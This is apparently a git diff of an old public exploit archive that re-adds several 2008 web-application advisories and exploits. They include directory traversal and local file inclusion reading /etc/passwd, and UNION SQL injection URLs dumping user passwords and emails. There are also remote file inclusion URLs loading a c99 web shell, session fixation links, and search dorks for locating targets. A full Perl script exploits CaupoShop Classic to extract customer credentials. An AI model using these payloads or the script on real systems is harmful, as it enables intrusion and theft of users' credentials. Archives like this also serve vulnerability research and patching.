-        at: http://[URL]/room.php?slc_lang=fa&sid=1&user_id=1
-        -------------
-    3.7. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.
-        -------------
-        First, clear the site's cookies, and then goto:
-        http://[URL]/homepg/index.php?PHPSESSID=BugReportIRSessionFixation
-        http://[URL]/homepg/login.php?PHPSESSID=BugReportIRSessionFixation
-        -------------
-####################
-4. Solution:
-####################
-    Source codes are encrypted. Wait for vendor patch.
-####################
-5. Credit:
-####################
-AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
-WwW.BugReport.ir
-WwW.AmnPardaz.com
-
-# milw0rm.com [2008-06-19]
+########################## www.BugReport.ir #######################################
+#
+#        AmnPardaz Security Research Team
+#
+# Title: Academic Web Tools CMS Multiple Vulnerabilities
+# Vendor: www.yektaweb.com
+# Vulnerable Version: 1.4.2.8 and prior versions
+# Exploit: Available
+# Impact: Medium
+# Fix: N/A
+# Original Advisory: www.bugreport.ir/?/44
+###################################################################################
+
+####################
+1. Description:
+####################
+    ACADEMIC WEB TOOLS (AWT) yektaweb is a Persian content management system (CMS) which can manage university conferences and journals too.
+####################
+2. Vulnerabilities:
+####################
+    2.1. Directory Traversal in "/download.php" in "dfile" parameter.
+        2.1.1. Exploit:
+                        Check the exploit/POC section.
+    2.2. Injection Flaws. SQL Injection in "/rating.php" in "book_id" parameter.
+        2.2.1. Exploit:
+                        Check the exploit/POC section.
+    2.3. Cross Site Scripting (XSS). Reflected XSS attack in "/login.php" in URL parameters.
+        2.3.1. Exploit:
+                        Check the exploit/POC section.
+    2.4. Cross Site Scripting (XSS). Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
+        2.3.1. Exploit:
+                        Check the exploit/POC section.
+    2.5. Cross Site Scripting (XSS). Reflected redirect XSS attack in "/rss_getfile.php" in "file" parameters.
+        2.4.1. Exploit:
+                        Check the exploit/POC section.
+    2.6. Cross Site Scripting (XSS). Stored XSS attack in "/room.php" chat service.
+        2.5.1. Exploit:
+                        Check the exploit/POC section.
+    2.7. Session Management Flaw. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.
+        2.5.1. Exploit:
+                        Check the exploit/POC section.
+####################
+3. Exploits/POCs:
+####################
+    Original Exploit URL: http://bugreport.ir/index.php?/44/exploit
+    3.1. Directory Traversal in "/download.php" in "dfile" parameter.
+        -------------
+        http://[URL]/download.php?dfile=../../../../../../etc/passwd
+        http://[URL]/download.php?dfile=../../../../../../../etc/crontab
+        -------------
+    3.2. SQL Injection in "/rating.php" in "book_id" parameter.
+        -------------
+        
    
+        
    
+        
+        
+        
+        -------------
+    3.3. Reflected XSS attack in "/login.php" in URL parameters.
+        -------------
+        http://[URL]/login.php?Fake=
+        -------------
+    3.4. Reflected XSS attack in "/hta/htmlarea.js.php" in "glb_sid" parameters.
+        -------------
+        http://[URL]/hta/htmlarea.js.php?glb_sid=
+        -------------
+    3.5. Reflected redirect XSS attack in "rss_getfile.php" in "file" parameters.
+        -------------
+        http://[URL]/rss_getfile.php?file=http://BugReport.ir
+        -------------
+    3.6. Reflected XSS attack in "room.php".
+        -------------
+        First of all, login into the site.
+        Now submit this : 
+        at: http://[URL]/room.php?slc_lang=fa&sid=1&user_id=1
+        -------------
+    3.7. "/homepg/index.php" and "/homepg/login.php" are vulnerable to session fixation.
+        -------------
+        First, clear the site's cookies, and then goto:
+        http://[URL]/homepg/index.php?PHPSESSID=BugReportIRSessionFixation
+        http://[URL]/homepg/login.php?PHPSESSID=BugReportIRSessionFixation
+        -------------
+####################
+4. Solution:
+####################
+    Source codes are encrypted. Wait for vendor patch.
+####################
+5. Credit:
+####################
+AmnPardaz Security Research & Penetration Testing Group
+Contact: admin[4t}bugreport{d0t]ir
+WwW.BugReport.ir
+WwW.AmnPardaz.com
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5862.txt b/platforms/php/webapps/5862.txt
index 24558d3fb..cc645876a 100755
--- a/platforms/php/webapps/5862.txt
+++ b/platforms/php/webapps/5862.txt
@@ -1,30 +1,30 @@
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #################################################################
- #   [ samart-cms 2.0 ]   Remote SQL Injection Vulnerability     #
- #################################################################
- #
- # Script site: http://samart.6x.to/
- # 
- # Vuln: 
- # http://site.com/site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member/*
- #
- # 
- # Dork example: "Powered by samart-cms"
- #
- ###############################################
- # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-06-19]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #################################################################
+ #   [ samart-cms 2.0 ]   Remote SQL Injection Vulnerability     #
+ #################################################################
+ #
+ # Script site: http://samart.6x.to/
+ # 
+ # Vuln: 
+ # http://site.com/site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member/*
+ #
+ # 
+ # Dork example: "Powered by samart-cms"
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5863.txt b/platforms/php/webapps/5863.txt
index 008c8b209..a08118248 100755
--- a/platforms/php/webapps/5863.txt
+++ b/platforms/php/webapps/5863.txt
@@ -1,30 +1,30 @@
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ##########################################################
- #   [ CMS-BRD ]   Remote SQL Injection Vulnerability     #
- ##########################################################
- #
- # Script site: http://www.cms.brdconcept.fr/
- # 
- # Vuln: 
- # http://site.com/index.php?lang=en&menuclick=-1+UNION+SELECT+concat_ws(char(58),USER(),DATABASE(),VERSION())/*
- #
- # 
- # Dork example: "Powered By CMS-BRD"
- #
- ###############################################
- # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-06-19]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ##########################################################
+ #   [ CMS-BRD ]   Remote SQL Injection Vulnerability     #
+ ##########################################################
+ #
+ # Script site: http://www.cms.brdconcept.fr/
+ # 
+ # Vuln: 
+ # http://site.com/index.php?lang=en&menuclick=-1+UNION+SELECT+concat_ws(char(58),USER(),DATABASE(),VERSION())/*
+ #
+ # 
+ # Dork example: "Powered By CMS-BRD"
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5864.txt b/platforms/php/webapps/5864.txt
index 060f99913..a6e51ec8a 100755
--- a/platforms/php/webapps/5864.txt
+++ b/platforms/php/webapps/5864.txt
@@ -1,38 +1,38 @@
-###############################################################
-#
-# Orlando CMS classes Remote File Include Vulnerabilities
-#
-###############################################################
-#
-# Discovered by : Ciph3r
-#
-#
-# MAIL : Ciph3r_blackhat@yahoo.com
-#
-#
-# SP TANX4 : Iranian hacker & Kurdish Security TEAM
-#
-#
-# CLASS : remote
-#
-# download cms: http://sourceforge.net/project/showfiles.php?group_id=195547
-#
-################################################################
-#
-# C0de :
-#               
-#               
-#  include($GLOBALS['preloc']."modules/core/logger/sticky.php");
-#     
-#       
-###############################################################
-
-EXPLOIT :
-
-http://127.0.0.1/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
-
-http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
-
-#####################################################################
-
-# milw0rm.com [2008-06-19]
+###############################################################
+#
+# Orlando CMS classes Remote File Include Vulnerabilities
+#
+###############################################################
+#
+# Discovered by : Ciph3r
+#
+#
+# MAIL : Ciph3r_blackhat@yahoo.com
+#
+#
+# SP TANX4 : Iranian hacker & Kurdish Security TEAM
+#
+#
+# CLASS : remote
+#
+# download cms: http://sourceforge.net/project/showfiles.php?group_id=195547
+#
+################################################################
+#
+# C0de :
+#               
+#               
+#  include($GLOBALS['preloc']."modules/core/logger/sticky.php");
+#     
+#       
+###############################################################
+
+EXPLOIT :
+
+http://127.0.0.1/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
+
+http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c99.php?
+
+#####################################################################
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5865.txt b/platforms/php/webapps/5865.txt
index 70fe19375..49ef39b38 100755
--- a/platforms/php/webapps/5865.txt
+++ b/platforms/php/webapps/5865.txt
@@ -1,102 +1,102 @@
-#!/usr/bin/perl
-######################
-#
-#CaupoShop Classic 1.3 Remote Exploit
-#
-######################
-#
-#Bug by: h0yt3r
-#
-#Dork: inurl:csc_article_details.php
-# Couldnt find a stable dork for this specific Version.
-#Exploit will only work on correct version.
-#
-##
-###
-##
-#
-#I found this long time ago but never actually shared it.
-#As the userid's are a bit messy you will only get the top 1 row value.
-#Change it if you like.
-#
-#Gr33tz go to:
-#thund3r, ramon, b!zZ!t, Free-Hack, Sys-Flaw and of course the pwning h4ck-y0u Team
-########
-
-use LWP::UserAgent;
-my $userAgent = LWP::UserAgent->new;
-
-usage();
-
-$server =   $ARGV[0];
-$dir = $ARGV[1];
-
-print"\n";
-if (!$dir) { die "Read Usage!\n"; }
-
-$filename ="csc_article_details.php";
-my $url = "http://".$server.$dir.$filename."?";
-
-my $Attack= $userAgent->get($url);
-if ($Attack->is_success)
-{
-    print "[x] Attacking ".$url."\n";
-}
-else
-{
-    print "Couldn't connect to ".$url."!";
-    exit;
-}
-
-print "[x] Injecting Black Magic\n";
-
-my @count = ("66666");
-
-for ($i = 6; $i<99; $i++)
-{
-    my $selectUrl = $url."saArticle[ID]=-275 union select 1,2,3,4, @count";
-    my $Attack= $userAgent->get($selectUrl);
-    if($Attack->content =~ 66666)
-        { last; }
-    else
-        { push(@count,",66666"); }
-}
-
-my $Final = $url."saArticle[ID]=-1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer";   
-
-my $Attack= $userAgent->get($Final);
-
-if($Attack->content =~ m/1337(.*?):(.*?)1337/i)
-{   
-    my $login = $1;
-    my $pass = $2;
-    print "[x] Success!\n";
-    print "[x] Top 1 User Details:\n";
-
-    print "    Username: ".$login."\n";
-    print "    Password: ".$pass."\n";
-}
-else
-{
-    print"[x] Something wrong...Version?\n";
-    exit;
-
-}
-
-sub usage()
-{
-    print q
-    {
-    #####################################################
-            CaupoShop Classic Remote Exploit
-                    -Written by h0yt3r-
-    Usage: CC.pl [Server] [Path]
-    Sample:
-    perl CC.pl www.site.com /shop/
-    ######################################################
-    };
-
-}
-#eof
-
-# milw0rm.com [2008-06-19]
+#!/usr/bin/perl
+######################
+#
+#CaupoShop Classic 1.3 Remote Exploit
+#
+######################
+#
+#Bug by: h0yt3r
+#
+#Dork: inurl:csc_article_details.php
+# Couldnt find a stable dork for this specific Version.
+#Exploit will only work on correct version.
+#
+##
+###
+##
+#
+#I found this long time ago but never actually shared it.
+#As the userid's are a bit messy you will only get the top 1 row value.
+#Change it if you like.
+#
+#Gr33tz go to:
+#thund3r, ramon, b!zZ!t, Free-Hack, Sys-Flaw and of course the pwning h4ck-y0u Team
+########
+
+use LWP::UserAgent;
+my $userAgent = LWP::UserAgent->new;
+
+usage();
+
+$server =   $ARGV[0];
+$dir = $ARGV[1];
+
+print"\n";
+if (!$dir) { die "Read Usage!\n"; }
+
+$filename ="csc_article_details.php";
+my $url = "http://".$server.$dir.$filename."?";
+
+my $Attack= $userAgent->get($url);
+if ($Attack->is_success)
+{
+    print "[x] Attacking ".$url."\n";
+}
+else
+{
+    print "Couldn't connect to ".$url."!";
+    exit;
+}
+
+print "[x] Injecting Black Magic\n";
+
+my @count = ("66666");
+
+for ($i = 6; $i<99; $i++)
+{
+    my $selectUrl = $url."saArticle[ID]=-275 union select 1,2,3,4, @count";
+    my $Attack= $userAgent->get($selectUrl);
+    if($Attack->content =~ 66666)
+        { last; }
+    else
+        { push(@count,",66666"); }
+}
+
+my $Final = $url."saArticle[ID]=-1 union select 1,2,3,concat(1337,email,0x3a,password,1337), @count from csc_customer";   
+
+my $Attack= $userAgent->get($Final);
+
+if($Attack->content =~ m/1337(.*?):(.*?)1337/i)
+{   
+    my $login = $1;
+    my $pass = $2;
+    print "[x] Success!\n";
+    print "[x] Top 1 User Details:\n";
+
+    print "    Username: ".$login."\n";
+    print "    Password: ".$pass."\n";
+}
+else
+{
+    print"[x] Something wrong...Version?\n";
+    exit;
+
+}
+
+sub usage()
+{
+    print q
+    {
+    #####################################################
+            CaupoShop Classic Remote Exploit
+                    -Written by h0yt3r-
+    Usage: CC.pl [Server] [Path]
+    Sample:
+    perl CC.pl www.site.com /shop/
+    ######################################################
+    };
+
+}
+#eof
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5866.txt b/platforms/php/webapps/5866.txt
index 738b0e389..9abb8c752 100755
--- a/platforms/php/webapps/5866.txt
+++ b/platforms/php/webapps/5866.txt
@@ -1,39 +1,39 @@
-###############################################################
-#
-# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities 
-#
-###############################################################
-#
-# Discovered by : Ciph3r
-#
-#
-# MAIL : Ciph3r_blackhat@yahoo.com
-#
-#
-# SP TANX4 : Iranian hacker & Kurdish Security TEAM 
-#
-# CLASS : remote
-#
-# download cms: http://sourceforge.net/project/showfiles.php?group_id=215112
-#
-################################################################
-#
-# C0de : 
-#                
-#                  
-#    include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
-#       
-#        
-###############################################################
-
-EXPLOIT :
-
- 
- http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
- 
- http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?
-
-
-#####################################################################
-
-# milw0rm.com [2008-06-19]
+###############################################################
+#
+# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities 
+#
+###############################################################
+#
+# Discovered by : Ciph3r
+#
+#
+# MAIL : Ciph3r_blackhat@yahoo.com
+#
+#
+# SP TANX4 : Iranian hacker & Kurdish Security TEAM 
+#
+# CLASS : remote
+#
+# download cms: http://sourceforge.net/project/showfiles.php?group_id=215112
+#
+################################################################
+#
+# C0de : 
+#                
+#                  
+#    include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
+#       
+#        
+###############################################################
+
+EXPLOIT :
+
+ 
+ http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
+ 
+ http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?
+
+
+#####################################################################
+
+# milw0rm.com [2008-06-19]
diff --git a/platforms/php/webapps/5869.txt b/platforms/php/webapps/5869.txt
index 58798ea86..ee00a4b0b 100755
--- a/platforms/php/webapps/5869.txt
+++ b/platforms/php/webapps/5869.txt
@@ -1,106 +1,106 @@
-########################## www.BugReport.ir #######################################
-#
-#        AmnPardaz Security Research Team
-#
-# Title: Virtual Support Office-XP Multiple Vulnerabilities.
-# Vendor: www.vso-xp.com
-# Vulnerable Version: 3.0.29, 3.0.27 and prior versions
-# Exploit: Available
-# Impact: High
-# Fix: N/A
-# Original Advisory: www.bugreport.ir/?/47
-###################################################################################
-
-####################
-1. Description:
-####################
-
-    Virtual Support Office XP is Web Based Help Desk Software Solution which allows you to forge strong
-    relationships and increase customer satisfaction, while dramatically streamlining support operations.
-    With the VSO-XP application, customer service and support professionals have the tools they need to
-    surpass the most ambitious quality-of-service or productivity goals you establish.
-
-####################
-2. Vulnerabilities:
-####################
-
-    2.1. Broken Authentication and Session Management. An attacker can have access to classified information. And see some of admin pages. such as:
-"/admin/Companies.asp", "/admin/customfeild.asp" and "admin/EmailAccountsUpd.asp". The Last one is particularly important for she Change the Servers Name and Mail Box and Servers Port.
-
-    2.2. Broken Authentication.An attacker can register (sign up) users at "/signup.asp" without any kind of supervision or disclosureing any kind of information-even submitting a true email address is not necessary-she can obtain her password by injection-see.
-
-    2.3. Broken Authentication and Session Management. An attacker can make an admin user at "/admin/addressnew.asp".
-
-    2.4. Injection Flaws. SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter. By using it an attacker can obtain the password of any user she wishes-including admin's. She can also get other information such as version of the database and...
-        2.4.1. Exploit:
-                        Check the exploit section.
-    2.5. Injection Flaws. SQL Injection in "/getpassword.asp" in"userID" parameter. By using it an attacker can obtain the password of any user she wishes.
-        2.5.1. Exploit:
-                        Check the exploit section.
-    2.6. Injection Flaws. SQL Injection in "/admin/accountupd.asp" in "keyid" parameter.Classified information can be obtained.
-        2.6.1. POC:
-                        https://url/admin/accountupd.asp?keyid=1%20having%201=1
-    2.7. Injection Flaws. SQL Injection in "/admin/clientupdreg.asp" in "Client_ID" parameter.
-        2.7.1. POC:
-                        https://url/admin/clientupdreg.asp?Client_ID=1%20having%201=1
-    2.8. Injection Flaws. SQL Injection in "/admin/EmailAccountsUpd_process.asp" in "KeyID" parameter.
-        2.8.1. POC:
-                        https://url/admin/EmailAccountsUpd_process.asp?KeyID=1 order by 2
-    2.9. Cross Site Scripting. There is a XSS in "/cases/case_search.asp" in search field.
-        2.9.1. POC:
-                        Insert  ">
-    2.10. Cross Site Scripting. There is a XSS in "/url/kb/kb_home.asp" in Search Field.
-        2.10.1. POC:
-                        Insert  ">
-    2.11 Cross Site Scripting. There is a XSS in "/downloads/search_folders.asp" in Search Fields.
-        2.11.1. POC:
-                        Insert  ">
-    2.12. Cross Site Scripting. There is a XSS in "/reports/MyIssuesReport.asp?id=336" in Report Title and Subject fields.
-        2.12.1. POC:
-                        Insert  ">
-    2.13. volunerable to file uploading and finding the phisical path to the file.
-        2.13.1. Exploit:
-                        Check the exploit section.
-    2.14. Path disclosure.
-        2.14.1 POC
-                        https://url/admin/accountnew2.asp
-####################
-3. Exploits:
-####################
-    Original Exploit URL: http://bugreport.ir/index.php?/47/exploit
-    Note1: Use Internet Explorer (IE) for best result.
-    3.4.1 SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter.
-            -------------
-            Obtain admin's password:
-                https://[URL]/admin/CustomFields.asp?Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users%20where%20USERID=%20'admin'--
-            -------------
-            Get other information such as version of the database and...:
-            https://[URL]/admin/CustomFields.asp?Group_ID=1union%20select%20@@version,1,1,1,1,1--
-            -------------
-    3.5.1 SQL Injection in "/admin/getpassword.asp" in "userID" parameter.
-            Insert the following Code in burpproxy, in userID field, change ANYUSERID to your choice of userID and get the password!
-            -------------
-            obtain the password of any user she wishes:
-            m%27%20or%201%20in%20%28select%20PASSWORD%20from%20users%20where%20USERID%3D%27ANYUSERID%27%29--
-            -------------
-    3.13.1 Scenario for file uploading and finding the physical path to the file.
-            -------------
-            Step1: Find the id of an existing folder easily at "/downloads/folders_root.asp?vsoxp_select=0"
-            Step2: Go to "/downloads/createfile.asp?id=VALIDFOLDERID" and upload your file.
-            Step3: Go back to step 1 and find your file?s ID.
-            Step4: Go to "/downloads/openlink.asp?id=YOURFILEID" and see the physical address of your file at server!
-            -------------
-####################
-4. Solution:
-####################
-    Edit the source code to ensure that inputs are properly sanitized for XSSes and Injections, and wait for vendor patch.
-####################
-5. Credit:
-####################
-AmnPardaz Security Research & Penetration Testing Group
-Web security is our art.
-Contact: admin[4t}bugreport{d0t]ir
-WwW.BugReport.ir
-WwW.AmnPardaz.com
-
-# milw0rm.com [2008-06-20]
+########################## www.BugReport.ir #######################################
+#
+#        AmnPardaz Security Research Team
+#
+# Title: Virtual Support Office-XP Multiple Vulnerabilities.
+# Vendor: www.vso-xp.com
+# Vulnerable Version: 3.0.29, 3.0.27 and prior versions
+# Exploit: Available
+# Impact: High
+# Fix: N/A
+# Original Advisory: www.bugreport.ir/?/47
+###################################################################################
+
+####################
+1. Description:
+####################
+
+    Virtual Support Office XP is Web Based Help Desk Software Solution which allows you to forge strong
+    relationships and increase customer satisfaction, while dramatically streamlining support operations.
+    With the VSO-XP application, customer service and support professionals have the tools they need to
+    surpass the most ambitious quality-of-service or productivity goals you establish.
+
+####################
+2. Vulnerabilities:
+####################
+
+    2.1. Broken Authentication and Session Management. An attacker can have access to classified information. And see some of admin pages. such as:
+"/admin/Companies.asp", "/admin/customfeild.asp" and "admin/EmailAccountsUpd.asp". The Last one is particularly important for she Change the Servers Name and Mail Box and Servers Port.
+
+    2.2. Broken Authentication.An attacker can register (sign up) users at "/signup.asp" without any kind of supervision or disclosureing any kind of information-even submitting a true email address is not necessary-she can obtain her password by injection-see.
+
+    2.3. Broken Authentication and Session Management. An attacker can make an admin user at "/admin/addressnew.asp".
+
+    2.4. Injection Flaws. SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter. By using it an attacker can obtain the password of any user she wishes-including admin's. She can also get other information such as version of the database and...
+        2.4.1. Exploit:
+                        Check the exploit section.
+    2.5. Injection Flaws. SQL Injection in "/getpassword.asp" in"userID" parameter. By using it an attacker can obtain the password of any user she wishes.
+        2.5.1. Exploit:
+                        Check the exploit section.
+    2.6. Injection Flaws. SQL Injection in "/admin/accountupd.asp" in "keyid" parameter.Classified information can be obtained.
+        2.6.1. POC:
+                        https://url/admin/accountupd.asp?keyid=1%20having%201=1
+    2.7. Injection Flaws. SQL Injection in "/admin/clientupdreg.asp" in "Client_ID" parameter.
+        2.7.1. POC:
+                        https://url/admin/clientupdreg.asp?Client_ID=1%20having%201=1
+    2.8. Injection Flaws. SQL Injection in "/admin/EmailAccountsUpd_process.asp" in "KeyID" parameter.
+        2.8.1. POC:
+                        https://url/admin/EmailAccountsUpd_process.asp?KeyID=1 order by 2
+    2.9. Cross Site Scripting. There is a XSS in "/cases/case_search.asp" in search field.
+        2.9.1. POC:
+                        Insert  ">
+    2.10. Cross Site Scripting. There is a XSS in "/url/kb/kb_home.asp" in Search Field.
+        2.10.1. POC:
+                        Insert  ">
+    2.11 Cross Site Scripting. There is a XSS in "/downloads/search_folders.asp" in Search Fields.
+        2.11.1. POC:
+                        Insert  ">
+    2.12. Cross Site Scripting. There is a XSS in "/reports/MyIssuesReport.asp?id=336" in Report Title and Subject fields.
+        2.12.1. POC:
+                        Insert  ">
+    2.13. volunerable to file uploading and finding the phisical path to the file.
+        2.13.1. Exploit:
+                        Check the exploit section.
+    2.14. Path disclosure.
+        2.14.1 POC
+                        https://url/admin/accountnew2.asp
+####################
+3. Exploits:
+####################
+    Original Exploit URL: http://bugreport.ir/index.php?/47/exploit
+    Note1: Use Internet Explorer (IE) for best result.
+    3.4.1 SQL Injection in "/admin/CustomFields.asp" in "Group_ID" parameter.
+            -------------
+            Obtain admin's password:
+                https://[URL]/admin/CustomFields.asp?Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users%20where%20USERID=%20'admin'--
+            -------------
+            Get other information such as version of the database and...:
+            https://[URL]/admin/CustomFields.asp?Group_ID=1union%20select%20@@version,1,1,1,1,1--
+            -------------
+    3.5.1 SQL Injection in "/admin/getpassword.asp" in "userID" parameter.
+            Insert the following Code in burpproxy, in userID field, change ANYUSERID to your choice of userID and get the password!
+            -------------
+            obtain the password of any user she wishes:
+            m%27%20or%201%20in%20%28select%20PASSWORD%20from%20users%20where%20USERID%3D%27ANYUSERID%27%29--
+            -------------
+    3.13.1 Scenario for file uploading and finding the physical path to the file.
+            -------------
+            Step1: Find the id of an existing folder easily at "/downloads/folders_root.asp?vsoxp_select=0"
+            Step2: Go to "/downloads/createfile.asp?id=VALIDFOLDERID" and upload your file.
+            Step3: Go back to step 1 and find your file?s ID.
+            Step4: Go to "/downloads/openlink.asp?id=YOURFILEID" and see the physical address of your file at server!
+            -------------
+####################
+4. Solution:
+####################
+    Edit the source code to ensure that inputs are properly sanitized for XSSes and Injections, and wait for vendor patch.
+####################
+5. Credit:
+####################
+AmnPardaz Security Research & Penetration Testing Group
+Web security is our art.
+Contact: admin[4t}bugreport{d0t]ir
+WwW.BugReport.ir
+WwW.AmnPardaz.com
+
+# milw0rm.com [2008-06-20]
diff --git a/platforms/php/webapps/5870.txt b/platforms/php/webapps/5870.txt
index 1f845d494..2d11ad8d0 100755
--- a/platforms/php/webapps/5870.txt
+++ b/platforms/php/webapps/5870.txt
@@ -1,67 +1,67 @@
-########################## www.BugReport.ir #######################################
-#
-#        AmnPardaz Security Research Team
-#
-# Title: GL-SH Deaf Forum <=6.5.5 Multiple Vulnerabilities
-# Vendor: www.frank-karau.de
-# Vulnerable Version: 6.5.5 and prior versions
-# Exploit: Available
-# Impact: High
-# Fix: N/A
-# Original Advisory: www.bugreport.ir/?/46
-###################################################################################
-
-####################
-1. Description:
-####################
-    Gl-SH Deaf board is programmed a free board in PHP, without My SQL, With 10 Designs and 5 languages.
-####################
-2. Vulnerabilities:
-####################
-    2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
-        2.1.1. Exploit:
-                        Check the exploit/POC section.
-    2.2. File (image) Upload without premission.
-        2.2.1. Exploit:
-                        Check the exploit/POC section.
-    2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
-        2.3.1. Exploit:
-                        Check the exploit/POC section.
-
-####################
-3. Exploits/POCs:
-####################
-    Original Exploit URL: http://bugreport.ir/index.php?/46/exploit
-    3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
-        -------------
-        LFI:
-            http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd
-        -------------
-    3.2. File (image) Upload with out premission.
-        -------------
-        Uploader link:
-            http://[URL]/[Forum Path]/upload.php
-        -------------
-    3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
-        -------------
-            
    
-                
-            "<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT>
-            
    
-            
-            
-        -------------
-####################
-4. Solution:
-####################
-    Edit the source code to ensure that inputs are properly sanitized. check permission for upload page.
-####################
-5. Credit:
-####################
-AmnPardaz Security Research & Penetration Testing Group
-Contact: admin[4t}bugreport{d0t]ir
-WwW.BugReport.ir
-WwW.AmnPardaz.com
-
-# milw0rm.com [2008-06-20]
+########################## www.BugReport.ir #######################################
+#
+#        AmnPardaz Security Research Team
+#
+# Title: GL-SH Deaf Forum <=6.5.5 Multiple Vulnerabilities
+# Vendor: www.frank-karau.de
+# Vulnerable Version: 6.5.5 and prior versions
+# Exploit: Available
+# Impact: High
+# Fix: N/A
+# Original Advisory: www.bugreport.ir/?/46
+###################################################################################
+
+####################
+1. Description:
+####################
+    Gl-SH Deaf board is programmed a free board in PHP, without My SQL, With 10 Designs and 5 languages.
+####################
+2. Vulnerabilities:
+####################
+    2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
+        2.1.1. Exploit:
+                        Check the exploit/POC section.
+    2.2. File (image) Upload without premission.
+        2.2.1. Exploit:
+                        Check the exploit/POC section.
+    2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
+        2.3.1. Exploit:
+                        Check the exploit/POC section.
+
+####################
+3. Exploits/POCs:
+####################
+    Original Exploit URL: http://bugreport.ir/index.php?/46/exploit
+    3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
+        -------------
+        LFI:
+            http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd
+        -------------
+    3.2. File (image) Upload with out premission.
+        -------------
+        Uploader link:
+            http://[URL]/[Forum Path]/upload.php
+        -------------
+    3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
+        -------------
+            
+            
+            "<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT>
+            
    
+            
+            
+        -------------
+####################
+4. Solution:
+####################
+    Edit the source code to ensure that inputs are properly sanitized. check permission for upload page.
+####################
+5. Credit:
+####################
+AmnPardaz Security Research & Penetration Testing Group
